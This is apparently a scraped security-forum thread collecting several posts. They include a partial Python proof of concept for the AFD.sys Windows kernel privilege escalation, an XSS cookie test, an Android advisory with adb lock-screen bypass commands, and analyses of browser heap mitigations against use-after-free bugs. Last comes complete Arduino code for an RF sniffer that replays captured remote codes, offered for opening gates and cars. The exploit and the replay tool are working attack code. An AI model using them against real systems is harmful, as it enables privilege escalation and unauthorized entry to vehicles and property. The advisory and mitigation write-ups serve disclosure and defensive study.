        Step 2 - IOCTL 0x120c3
    Exploitation
        READ-/WRITE-Primitives through WorkerFactory Objects
        Controlled Data on NonPagedPoolNx Pool
        Leak Target
        Single-Gadget-ROP for SMEP Evasion
        Shellcode
        Putting it all together
Patch Analysis

[…]
targetsize = 0x100
virtaddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize - 0x30) / 8) - 0xfff - (virtaddress & 0xfff)

IOCALL = windll.ntdll.ZwDeviceIoControlFile

def I(val):
    return pack("<I", val)

inbuf1 = I(0)*6 + I(virtaddress) + I(mdlsize) + I(0)*2 + I(1) + I(0)
inbuf2 = I(1) + I(0xaaaaaaa) + I(0)*4
[…]
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM,                # [1]
                 socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
    print "[-] no luck creating socket!"
    sys.exit(1)
print "[+] got sock 0x%x" % sock

addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))                            # [2]
print "[+] sock connected."

print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x2aaaaaa
while(1):
    hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)   # [3]
    if hrgn == 0:
        break
    rgnarr.append(hrgn)
    print ".",
print "\n[+] GO!"

IOCALL(sock,None,None,None,byref(IoStatusBlock),                    # [4]
       0x1207f, inbuf1, 0x30, "whatever", 0x0)
IOCALL(sock,None,None,None,byref(IoStatusBlock),                    # [5]
       0x120c3, inbuf2, 0x18, "whatever", 0x0)
print "[+] after second IOCTL! this should not be hit!"

Download: http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
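As a side note, the mdlsize computation at the top of the POC can be checked on its own. A minimal Python 3 sketch with the same constants (// used for the integer division):

```python
targetsize = 0x100
virtaddress = 0x13371337

# Same arithmetic as the POC's mdlsize line, with integer division.
mdlsize = (2 ** 0x0C * (targetsize - 0x30) // 8) - 0xFFF - (virtaddress & 0xFFF)
print(hex(mdlsize))  # 0x18cca
```

So for the chosen target chunk size of 0x100 and the magic virtual address 0x13371337, the POC requests an MDL describing 0x18cca bytes.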
-
[h=1]armbot[/h] armbot is an irc bot written in armv6-linux-gnueabi assembler. [h=1]features[/h] connect to a non-ssl irc server ping/pong join a channel respond to "armbot: source" [h=1]motivation[/h] lol [h=1]requirements to run on x86_64[/h] qemu-arm as/ld with armv6 target (optional) gdb with armv6 target for debugging It may be necessary to change the XPREFIX variable in the Makefile to match the local cross-compilation binaries. Sursa: https://github.com/wyc/armbot#armbot
-
What data do antivirus programs transmit about you?
Nytro replied to -Immortal-'s topic in Stiri securitate
It can be found out. It just takes some research. And a driver. And a bypass of their self-defense protections.
Thanks. ComputerWorld: Emergency vBulletin patch fixes SQL injection vulnerability - Computerworld
-
[h=1]Hacker Way: Rethinking Web App Development at Facebook[/h] Delivering reliable, high-performance web experiences at Facebook's scale has required us to challenge some long-held assumptions about software development. Join us to learn how we abandoned the traditional MVC paradigm in favor of a more functional application architecture.
-
Yes. In a few days. So people have time to update.
-
Try an alert(document.cookie) and see if you get the cookies named Y and T.
-
Can that XSS vector reach another user on Messenger? Is it remote or just self-XSS? One had been posted before. Is it in Send SMS?
-
From almost every point of view, KDE > Gnome. My opinion. That said, Gnome is more stable; some KDE applications still crash badly.
-
Au lansat patch-ul: Security Patch Release for vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1, and 5.1.2 - vBulletin Community Forum
-
Windows Phone 8 Application Security Whitepaper
Syscan 2014 Singapore – Alex Plaskett and Nick Walker
2014/03/30

Contents
1. Introduction
2. Background
    2.1 Application Overview
    2.2 Code Signing
    2.3 Sandboxing
    2.4 Exploit Mitigation
    2.5 Encryption
    2.6 Secure Boot
    2.7 Developer Unlock
    2.8 Previous Work
3. Black box Assessment
    3.1 Obtaining Marketplace Applications
    3.2 Application Structure
    3.3 Decompiling Marketplace Applications
    3.4 Patching Marketplace Applications
    3.5 Obtaining a remote shell
    3.6 Building Standalone Executables
4. Local Data Protection
    4.1 Insecure Data Storage
    4.2 Data Protection API (DPAPI)
    4.3 Local Database Security
5. Transmission Security
    5.1 Traffic Interception
    5.2 Cipher Support and Certificate Validation
6. Interprocess Communication
    6.1 File and Protocol Handlers
    6.2 Cross Application Navigation Forgery
7. Input Validation
    7.1 Web Browser Control
    7.2 Cross Site Scripting (XSS)
    7.3 SQL Injection
    7.4 XAML Injection
    7.5 JavaScript Bridge Security
8. Backgrounding and Application State
9. Push Notifications
10. Application Logging
11. C++/WinRT Native Code
12. Samsung ATIV S
    12.1 Registry Access
    12.2 File System Access
    12.3 Enable All Side Loading / Bootstrap Samsung
13. Conclusions
14. Acknowledgements
15. References

Download: https://labs.mwrinfosecurity.com/system/assets/651/original/mwri_wp8_appsec-whitepaper-syscan_2014-03-30.pdf
-
Android 4.4.2 Secure USB Debugging Bypass

A vulnerability found in Android 4.2.2-4.4.2 allowed attackers to bypass Android's secure USB debugging; this allowed attackers to access adb prior to unlocking the device.

Software: Android
Affected Versions: Android 4.2.2-4.4.2
CVE Reference:
Authors: Henry Hoggard, MWR Labs (https://labs.mwrinfosecurity.com)
Severity: Medium
Vendor: Google
Vendor Response: Fixed in Android 4.4.3

Description:
Android Debug Bridge (adb) is a command line tool that allows users to communicate with and debug the device. It gives users permission to access many areas of the device, including the ability to manage apps, access device logs, read device input, take backups and execute OS commands. In Android 4.2.2, Google implemented Secure USB Debugging, aimed at preventing adb from being connected to malicious computers. The user has to authorize a computer before it can connect with adb. The idea is that users can only authorize a computer after entering the password and unlocking the device. The bug detailed here is only exploitable when adb is enabled on the device.

Impact:
If adb is enabled on the device, attackers with physical access to a device can bypass Android's secure USB debugging protection. This allows attackers to gain adb access to the device, which would allow them to:
• Install/uninstall applications
• Bypass the lock screen
• Access a high privilege shell on the device
• Steal data from applications and settings on the device

Cause:
The adb authorize host confirmation dialog is displayed prior to unlocking the device on the emergency dialer and lock screen camera. This allows attackers with physical access to authorize their computer and connect with adb.

Interim Workaround:
If you are running a vulnerable version of Android, it is recommended to disable adb to prevent this attack.
Solution:
Android 4.4.3 prevents the adb authorization confirmation dialog from being opened in the emergency dialer and lock screen camera prior to unlocking the device. Users can now only authorize a computer with adb after the lock screen stage is passed. Therefore it is recommended that a strong device password is used.

Technical details:
The intended design of secure USB debugging is that the user must unlock the device to be able to authorize new adb hosts. If the user attempts to use adb while still at the Android lock screen, it will throw the following error:

error: device unauthorized. Please check the confirmation dialog on your device

MWR discovered that by navigating to either the emergency dialer or the lock screen camera, then typing the commands below, it was possible to trigger the confirmation dialog; the attacker could then accept this dialog and gain adb access to the device without knowing the device password.

$ adb kill-server
$ adb shell

After gaining adb access to the device, the lock screen is bypassed with the following command:

$ adb shell pm clear com.android.keyguard

The below image shows the USB confirmation dialog displayed on the emergency dialer.

Detailed Timeline:
[TABLE]
[TR]
[TD] Date[/TD]
[TD] Summary[/TD]
[/TR]
[TR]
[TD] 26/02/2014[/TD]
[TD] Reported to Google[/TD]
[/TR]
[TR]
[TD] 27/02/2014[/TD]
[TD] Google start investigating issue[/TD]
[/TR]
[TR]
[TD] 29/04/2014[/TD]
[TD] Google replied stating that a patch has been created[/TD]
[/TR]
[TR]
[TD] 04/06/2014[/TD]
[TD] Android 4.4.3 officially released containing patch[/TD]
[/TR]
[/TABLE]

Sursa: https://labs.mwrinfosecurity.com/advisories/2014/07/03/android-4-4-2-secure-usb-debugging-bypass/
-
Isolated Heap & Friends - Object Allocation Hardening in Web Browsers

In a recent Microsoft Patch Tuesday, Internet Explorer introduced a new heap protection aimed at making the exploitation of use-after-free vulnerabilities more difficult. This blog post details the protection, how it works, and how it compares to similar protections present in Mozilla Firefox and Google Chrome.

Many people noted the huge amount of fixes for Internet Explorer vulnerabilities (59 in total) in the recent Microsoft Patch Tuesday release. Even more interesting is the addition of a new exploitation mitigation feature in IE, the Isolated Heap for DOM objects. This feature aims to harden the browser against the exploitation of use-after-free (UAF) vulnerabilities, as well as some other memory corruption bug classes. Chrome and Firefox deploy similar mitigations, which we will discuss later in this blog post. First, let's have a look at the generic pattern of exploiting use-after-free vulnerabilities and the new Isolated Heap protection in Internet Explorer.

Exploiting use-after-free vulnerabilities

Due to the way heaps typically work, recently freed chunks of memory are preferred for fulfilling requests for similarly sized allocations, in order to prevent fragmentation of the heap and make optimal use of CPU cache behaviour. An attacker trying to exploit a use-after-free vulnerability reliably will likely try to allocate controlled data in place of the recently freed object. Typically, this controlled data is either an arbitrarily controllable type (such as a string or ArrayBuffer), or an object of a different type to the one that has been freed (replacing the object with one of the same type has limited worth from an exploitation point of view).

The Isolated Heap in Internet Explorer

Most of the DOM objects and supporting objects are now allocated on a separate heap. This will prevent an attacker from easily allocating arbitrary data in the space of a freed DOM object.
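The chunk-reuse behaviour behind the generic exploitation pattern above can be modelled with a toy LIFO free list; this is an illustration of the general allocator heuristic only, not any browser's actual heap:

```python
class ToyHeap:
    """Toy allocator: the most recently freed chunk of a size class is
    handed straight back to the next allocation of that size."""

    def __init__(self):
        self.freelist = {}   # size -> stack of freed chunk ids
        self.counter = 0

    def alloc(self, size):
        stack = self.freelist.setdefault(size, [])
        if stack:
            return stack.pop()        # reuse the freed chunk first
        self.counter += 1
        return self.counter           # otherwise hand out a fresh chunk

    def free(self, chunk, size):
        self.freelist[size].append(chunk)

heap = ToyHeap()
obj_a = heap.alloc(0x80)      # step 1: object A is allocated...
heap.free(obj_a, 0x80)        # ...and later freed
obj_b = heap.alloc(0x80)      # step 2: attacker data lands on the same chunk
assert obj_b == obj_a         # step 3: the dangling pointer now sees B's data
```

The mitigations discussed in the rest of this post all attack step 2 of this pattern in one way or another.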
The separate heap is allocated during the initialisation phase of mshtml.dll:

; START OF FUNCTION CHUNK FOR __DllMainStartup@12
loc_63C94EA9:
    push    0                           ; dwMaximumSize
    push    0                           ; dwInitialSize
    push    0                           ; flOptions
    call    ds:__imp__HeapCreate@12     ; HeapCreate(x,x,x)
    mov     _g_hIsolatedHeap, eax

The handle to the newly created heap is stored in a global variable. A call is made to the HeapSetInformation_LowFragmentation_Downlevel function, which will forcefully enable the Low Fragmentation Heap for this newly created heap. By following the references to the global variable, it is straight-forward to track down the allocation functions for the Isolated Heap:

_MemIsolatedAlloc
_MemIsolatedAllocClear

The "Clear" variant will call HeapAlloc with the HEAP_ZERO_MEMORY flag set, which will zero all allocated memory before returning the newly allocated buffer. This is presumably done in order to prevent the exploitation of uninitialised memory vulnerabilities. Interestingly, this is not done for all objects; only the following object types are allocated by the non-zeroing variant:

CDOMTextNode
CTextNodeMarkupPointer
CMarkupPointer
CTraversalNodeIterator
CDomRange

The list of objects allocated by the zeroing variant is much larger and too long to list here, as it includes all HTML and SVG DOM Elements and supporting Elements such as CTreeNode, CMarkup, CAttribute and others.

Effectiveness

The most obvious shortcoming of this implementation is that the protection is restricted to only a subset of objects in the browser. However, it is an improvement, as the chosen subset includes many of the objects which are complex, and prone to UAF conditions as a result. Using the standard heap implementation (as opposed to a separate heap implementation) to try to prevent the exploitation of use-after-free vulnerabilities in a browser also has a few problems.
Compared to the protections in other browsers, it should be fairly easy for an attacker to allocate objects of a different type over a freed object, especially when heap chunks are coalesced. When the zeroing variant of the allocation function is used, the protection against uninitialised memory vulnerabilities appears to be effective for the subset of protected objects. However, a number of other objects exist that are unprotected or allocated without first zeroing the memory, and these objects may still be partially uninitialised. Without a doubt, the sudden introduction of this new mitigation technique on a Patch Tuesday will impact actively exploited in-the-wild vulnerabilities, and at the very least will provide some headaches for attackers.

Arena and Frame Poisoning in Mozilla Firefox

Ever since the fork from Netscape, Firefox has used arena allocations for certain object types to recycle common object sizes and improve allocation efficiency. While this was initially done for performance reasons, it has some security benefits as well. In 2009, Mozilla added a protection called Frame Poisoning for some frame object allocations which were being heavily used during the page layout phase. Every object that is freed will be replaced with a chosen pattern, making it easier to spot existing use-after-free vulnerabilities through use of the poisoned value (see here for an example). The current implementation can be found in the nsPresArena, and supports three types of allocations:

By object ID
By frame ID
By size

A separate free list is maintained for every object ID, frame ID and size allocation. During the lifetime of a presentation shell, a certain object or frame type will always be guaranteed to be allocated in a space that will only ever be filled with an object of the same type, or a poison value. This will prevent an attacker from filling a freed object's memory with arbitrary values.
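The poison-on-free idea can be illustrated with a toy arena. This is an illustration only; the poison value below is invented, not Mozilla's actual pattern, and real frame poisoning operates on raw memory rather than Python objects:

```python
POISON = 0xDEADBEEF  # invented placeholder, not the real poison pattern

class FrameArena:
    """Toy arena: freed slots are overwritten with a poison value and
    only recycled for allocations from this same arena."""

    def __init__(self):
        self.slots = []      # slot index -> contents
        self.freelist = []

    def alloc(self, contents):
        if self.freelist:
            slot = self.freelist.pop()
            self.slots[slot] = contents
            return slot
        self.slots.append(contents)
        return len(self.slots) - 1

    def free(self, slot):
        self.slots[slot] = POISON    # poison instead of leaving stale data
        self.freelist.append(slot)

arena = FrameArena()
frame = arena.alloc("frame-data")
arena.free(frame)
# A dangling read now hits the recognisable poison value, not attacker data.
dangling_read = arena.slots[frame]
assert dangling_read == POISON
```

A dangling use therefore crashes (or misbehaves) on a recognisable pattern, which is exactly what makes these bugs easier to spot and harder to exploit.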
Effectiveness

While this protection is effective for frame object allocation, many other object types in Firefox are not protected in a similar way (e.g. DOM objects), which still allows attackers to exploit use-after-free vulnerabilities in those unprotected object types.

PartitionAlloc in Google Chrome

Chrome uses Blink (a forked version of WebKit) as its rendering engine. One of the security features added to Blink since the fork from WebKit is a separate heap allocator called PartitionAlloc. PartitionAlloc separates allocations on its heap into partitions, depending on the type of objects that will be allocated within that partition. At present, there are four partitions:

ObjectModelPartition - This stores all objects which are subclasses of the Node class. This roughly equates to almost all objects from the DOM tree.
RenderingPartition - This stores all objects within the render tree. To understand how these objects relate to the DOM tree, there is a good talk by Eric Seidel from Google on the subject.
BufferPartition - This stores objects from the Web Template Framework (the sometimes aptly named WTF). This includes many of the JavaScript native types, such as ArrayBuffer (typed and untyped) and StringImpl.
"General Partition" - This stores all allocations served by WTF::fastMalloc (when the use of the system malloc is not specified).

Within each partition, allocations are further separated into buckets based on the size of the allocation. Separating allocations by size hopes to limit an attacker's options for different objects that can be reliably allocated in place of the freed object. For example, let's say that an attacker has triggered the free of a DOM object that occupied a 176-byte chunk of memory on the heap. As discussed earlier in this post, prior to PartitionAlloc an attacker would have a number of options for allocations in place of the freed object.
However, with PartitionAlloc, an attacker would be limited to allocating an object from the same partition (the ObjectModelPartition in this case) and of roughly the same size (176 bytes).

Effectiveness

The worst case for this limitation is that a number of objects exist which fulfil these criteria (this can happen when the memory footprint of the freed object is the same size as that of a generic base class, such as HTMLElement); however, there is still a smaller subset of candidate objects available to an attacker. In addition, replacing the freed object with a different object will either result in replacing the vtable pointer of the freed object with a similar one, or with a freelist pointer (depending on whether the replacement object is in use or free). In either case, the most flexible option (from the point of view of an attacker) would be replacing the memory with objects where the data is controlled completely (such as a Uint8Array). As these objects are allocated outside of the current PartitionRoot, this is not possible. The best case scenario is that there is only one object which fulfils these criteria, and as a result it is only possible to replace the freed object with another object of the same type. This makes exploitation significantly more challenging, but not impossible (the newly allocated object may have a different state, or reference memory left over from the previous object which may now also be free).

Sursa: https://labs.mwrinfosecurity.com/blog/2014/06/20/isolated-heap-friends---object-allocation-hardening-in-web-browsers/
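The combined type-partition and size-bucket separation described above can be sketched with a toy model. Assumed simplifications: 16-byte buckets and abstract slot ids; this illustrates the idea, not Blink's actual implementation:

```python
class Partition:
    """Toy partitioned allocator: a freed slot can only be reclaimed by an
    allocation from the same partition and the same size bucket."""

    def __init__(self, name):
        self.name = name
        self.freelists = {}   # bucket size -> freed slot ids
        self.next_slot = 0

    def _bucket(self, size):
        return (size + 15) // 16 * 16   # round up to a 16-byte bucket

    def alloc(self, size):
        bucket = self._bucket(size)
        freelist = self.freelists.setdefault(bucket, [])
        if freelist:
            return freelist.pop()       # reuse a freed slot of this bucket
        self.next_slot += 1
        return (self.name, bucket, self.next_slot)

    def free(self, slot):
        self.freelists[slot[1]].append(slot)

dom = Partition("ObjectModelPartition")
buf = Partition("BufferPartition")

victim = dom.alloc(176)     # the freed 176-byte DOM object from the example
dom.free(victim)

attacker_buf = buf.alloc(176)   # different partition: never lands on the slot
same_type = dom.alloc(176)      # same partition and bucket: reclaims it
assert attacker_buf != victim
assert same_type == victim
```

In this model, fully attacker-controlled buffer types (the BufferPartition) can never be placed over the freed DOM slot; only another object of the same partition and bucket can, which mirrors the limitation described above.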
-
Is use-after-free exploitation dead? The new IE memory protector will tell you

by Zhenhua 'Eric' Liu | July 16, 2014

The Isolated Heap for DOM objects included in the Microsoft Patch Tuesday release for June 2014 was just a fire drill aimed at making the exploitation of use-after-free (UAF) vulnerabilities more difficult. The patch for July 2014, however, has been quite a shock to exploit developers! In this release, Microsoft showed some determination in fighting back against UAF bugs with this improvement - the introduction of a new memory protector in Microsoft Internet Explorer, which makes the exploitation of UAF vulnerabilities extremely difficult.

An Overview Of The Changes

In the July 2014 update, a total of fourteen MSHTML!MemoryProtection functions and one global variable have been added to improve the freeing of memory for HTML and DOM elements.

Figure 1. The MemoryProtection functions.

In this update, we can also see that significant changes have been made in the destructors of most elements:

The HeapFree function has been replaced with MemoryProtection::CMemoryProtector::ProtectedFree.
The HeapFree function has been replaced with ProcessHeapFree (a fastcall version of MemoryProtection::CMemoryProtector::ProtectedFree).
Some destructors just implement the same mechanism, using MemoryProtection::CMemoryProtector::ProtectedFree directly.

Figure 2. The ProtectedFree functions that have replaced HeapFree.

How do these new functions work? And how do these changes stop the exploitation of use-after-free bugs and other kinds of exploits? The following technical analysis will tell you.

Technical Analysis

Memory allocations typically reuse similarly-sized chunks of memory that have been previously freed. Taking advantage of this behavior, the traditional way of exploiting a use-after-free bug consists of the following process:

1) The program allocates and then later frees object A.
2) The attacker allocates object B over the freed memory, carefully controlling the data that will be used later.
3) The program uses freed object A, referencing the attacker-controlled data.

The most effective mitigation should be to make Step 2 above, the replacement of an object, harder or even impossible. There are some ways that the defender can do this:

A) The ultimate way is to use a type-safe memory management system, which would prevent the attacker from reclaiming the freed memory using a different type of object. The attacker could only replace the memory using the same type of object, which does not help at all in exploitation.

B) The cheaper way is to do some tricks in the current memory management system to make the memory allocation and freeing behavior out of the attacker's control.

Specifically, the method in B is the improvement that we have seen in IE: in June 2014, an isolated heap was added to the memory allocation methods; and in July 2014, the protected free method was implemented. The isolated heap that was introduced could bring some trouble to attackers, but if the mitigation relied only on this, it would still be fairly easy to bypass; an attacker could still reference the freed objects with a different type, especially when the chunks of memory have been merged. The story has changed with the newly added protected free method in the July 2014 update. In each thread of an IE process, a MemoryProtector structure has been introduced to protect the current thread, as its name implies.

Figure 3. The MemoryProtector structure.

The BlockArray in this structure stores the size and address of the elements to be freed. The new function MemoryProtection::CMemoryProtector::ProtectedFree then makes use of the MemoryProtector structure to make the freeing of the elements' memory safer.

Figure 4. The MemoryProtection::CMemoryProtector::ProtectedFree function.
Generally speaking, this function, which is responsible for freeing the protected memory, acts like a simple conservative garbage collector. Instead of releasing the unused space immediately, which would give attackers a chance to re-allocate it, MemoryProtection::CMemoryProtector::ProtectedFree first holds these unused blocks (filling their contents with zeroes) until their number or total size meets a specific threshold. Even when this threshold is met, it does not release every stored element's memory right away, as it still needs to perform a "mark and sweep" pass. In Figure 4, this can be seen in the calls to MarkBlocks and ReclaimUnmarkedBlocks.

The marking process scans the stack and marks every pending element that is still referenced there; these marked elements will not be freed in the sweeping process. This prevents the use of a freed object whose address still lives on the stack.

Figure 5. The MemoryProtection::CMemoryProtector::MarkBlocks function.

Eventually, the unmarked elements are freed in the sweeping process.

Figure 6. The MemoryProtection::CMemoryProtector::ReclaimUnmarkedBlocks function.

Now, let's switch our point of view to the attacker's side. To exploit a use-after-free bug under these new conditions, we first need to find a controlled allocation method in the same heap as the freed object. We then need to predict the memory state (how many frees are still needed before triggering the actual free) when freeing an object. After that, we need to build the release sequence perfectly to make sure that the previously freed object's space has actually been released. That already sounds difficult, but that's not all: we also have to predict possible memory coalescing, handle conflicts from other unknown allocations, and then reclaim the memory with good timing. After all of that, we might finally be able to take control of the previously freed element's space.
At this point, I'm afraid that most attackers who were trying to exploit use-after-free bugs have given up already.

Further Thoughts

As we can see at the beginning of the function MemoryProtection::CMemoryProtector::ProtectedFree in Figure 4, if the variable MemoryProtection::CMemoryProtector::tlsSlotForInstanc is equal to -1 or if TlsGetValue() fails, the old HeapFree is called directly, but either condition is obviously tough for an attacker to bring about.

Some heap manipulation techniques are affected by the joint action of the isolated heap and protected free, because such techniques need to free some elements to make holes for the vulnerable buffer. The delayed free mechanism should give attackers some headaches, but manipulation is not impossible, as long as an attacker can find a controlled allocation method in the same heap and is able to free a reasonable number of elements.

Would the simple conservative garbage collector introduce a new attack surface, such as the classic ASLR bypass by Dion? It is possible to place an integer value on the stack and then brute-force guess the address of the elements that are about to be freed. However, even if an attacker could guess this address, one still cannot obtain a useful pointer, such as a vftable that would leak a base DLL address, because the contents of the memory have already been zeroed out.

In conclusion, building a reliable use-after-free exploit in IE is extremely difficult now. Well done, MSRC guys!

Special Contribution by Margarette Joven

Sursa: Fortinet Blog | News and Threat Research
-
RF Sniffer – open gates, cars, and RF remote controlled devices with ease.

The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I'm being very polite here). This time, I would like to share my 315MHz/434MHz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.

TIP – The size of the antenna is VERY important. Don't neglect it – use the right length, and use a wave calculator for future reference.

The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315MHz/434MHz). Using the following design, you can easily build a fuzzer to randomly open/close/control all kinds of RF receivers out there. You have been warned.

The current version of the sniffer will resend whatever it sniffs 10 times; this behavior is easily changeable. I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.
Shopping List

Amount | Part Type          | Properties
-------|--------------------|-----------------------------------------------
2      | Inductor           | wire antenna
1      | Red LED – 5mm      | package 5 mm [THT]; leg yes; color Red (633nm)
1      | Arduino Uno (Rev3) | type Arduino UNO (Rev3)
1      | 315MHz RF-LINK_RX  | package rf-link_rx; part # WRL-10533
1      | 434MHz RF-LINK_RX  | package rf-link_rx; part # WRL-10532
1      | 315MHz RF-LINK_TX  | package rf-link_tx; part # WRL-10535
1      | 434MHz RF-LINK_TX  | package rf-link_tx; part # WRL-10534

Scheme

We connect both receivers/transmitters like the following:

Code

And here is the Arduino code. Use at your own risk.

/*
 * RF Sniffer © Elia Yehuda 2014
 *
 * This program was coded.
 *
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup() {
  // print fast to console
  Serial.begin(115200);

  // configure the LED pin as an output before using digitalWrite
  pinMode(LED_PIN, OUTPUT);

  // 315 receiver on interrupt #0 (pin #2)
  rf315Switch.enableReceive(0);
  // 315 transmitter on pin #4
  rf315Switch.enableTransmit(4);
  // how many resends
  rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

  // 434 receiver on interrupt #1 (pin #3)
  rf434Switch.enableReceive(1);
  // 434 transmitter on pin #5
  rf434Switch.enableTransmit(5);
  // how many resends
  rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

  Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
  static char b[33];
  b[32] = '\0';
  for (int z = 0; z < 32; z++) {
    b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
  }
  return b;
}

// note: the switch is passed by reference so that resetAvailable()
// acts on the original object rather than on a copy
void process_rf_value(RCSwitch &rfswitch, int rf)
{
  char str[120];
  unsigned long value;

  // flash a light to show transmission
  digitalWrite(LED_PIN, HIGH);

  value = rfswitch.getReceivedValue();
  if (value) {
    sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d",
            rf, tobin32(value), value, rfswitch.getReceivedBitlength(),
            rfswitch.getReceivedProtocol());
    // resend the sniffed value (RESEND_SNIFFED_VALUES times);
    // unknown encodings (value == 0) are not resent
    rfswitch.send(value, rfswitch.getReceivedBitlength());
  } else {
    sprintf(str, "[-] %d Received: Unknown encoding (0)", rf);
  }
  Serial.println(str);

  // reset the switch to allow more data to come
  rfswitch.resetAvailable();

  // stop light to show end of transmission
  digitalWrite(LED_PIN, LOW);
}

void loop() {
  if (rf315Switch.available()) {
    process_rf_value(rf315Switch, 315);
  }
  if (rf434Switch.available()) {
    process_rf_value(rf434Switch, 434);
  }
}

Sursa: RF Sniffer – open gates, cars, and RF remote controlled devices with ease. | Ziggy's of the world